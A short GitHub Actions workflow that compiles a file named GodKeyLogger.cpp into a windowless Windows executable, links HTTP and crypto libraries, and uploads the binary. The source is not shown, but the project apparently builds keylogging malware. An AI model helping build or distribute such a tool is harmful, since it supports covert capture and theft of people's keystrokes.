name: Build GodKeyLogger

on: [push]

jobs:
  build:
    runs-on: windows-latest
    
    steps:
    - uses: actions/checkout@v4
    
    - name: Build
      shell: cmd
      run: |
        call "C:\Program Files\Microsoft Visual Studio\2022\Enterprise\VC\Auxiliary\Build\vcvars64.bat"
        
        cl.exe /nologo /EHsc /O2 /std:c++17 ^
          /DUNICODE /D_UNICODE /MT ^
          GodKeyLogger.cpp ^
          /link /SUBSYSTEM:WINDOWS ^
          /OUT:GodKeyLogger.exe ^
          user32.lib gdi32.lib advapi32.lib winhttp.lib crypt32.lib
        
    - uses: actions/upload-artifact@v4
      with:
        name: GodKeyLogger
        path: GodKeyLogger.exe
